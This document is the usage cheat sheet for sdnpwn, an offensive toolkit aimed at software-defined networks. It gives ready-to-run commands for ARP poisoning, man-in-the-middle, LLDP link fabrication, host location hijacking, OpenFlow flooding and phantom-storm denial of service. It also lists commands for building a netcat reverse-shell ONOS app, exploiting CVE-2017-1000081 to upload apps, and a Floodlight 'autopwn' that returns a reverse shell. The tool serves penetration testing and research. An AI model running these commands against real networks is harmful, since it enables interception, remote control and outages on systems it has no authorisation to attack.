Get sdnpwn

The latest version of sdnpwn can be found on Github.

Now available on BlackArch Linux!

Getting Started

The basic usage of sdnpwn is like so:

./sdnpwn.py <module name> <options>

An article introducing sdnpwn and it’s basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.

Reconnaissance

  • arpmon
    ./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 
    ./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses
  • sdn-detect
    ./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
    ./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
    ./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
  • controller-detect
    ./sdnpwn.py controller-detect -i eth0 --lldp #Test usign observed LLDP messages at interface eth0
    ./sdnpwn.py controller-detect -t 192.168.0.3 #Test NB Inter. of controller at 192.168.0.3
  • of-scan
    ./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service
    ./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service

Management

  • help
    ./sdnpwn.py help #Print sdnpwn help
  • mods
    ./sdnpwn.py mods #Print a list of all executable modules
    ./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in it's name
    ./sdnpwn.py mods -n new-mod #Create a new module named "new-mod"
    ./sdnpwn.py mods -r new-mod #Remove module named "new-mod"
  • info
    ./sdnpwn.py info test-mod #Print information for module named "test-mod"
  • system
    ./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

  • lfa-relay
    ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
    ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
     --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel
  • lfa-scapy
    ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
    ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script
  • lldp-replay
    ./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
    ./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
  • host-location-hijack
    ./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7
  • of-switch
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
  • of-gen
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633 
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages 
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
     --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
  • onos-app
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
    
    
  • onos-app-upload
    ./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
  • floodlight-debug-autopwn
    ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888
    ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell
  • dp-arp-poison
    ./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11
  • dp-mitm
    ./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway
  • phantom-host-scan
    ./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan
  • phantom-storm
    ./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets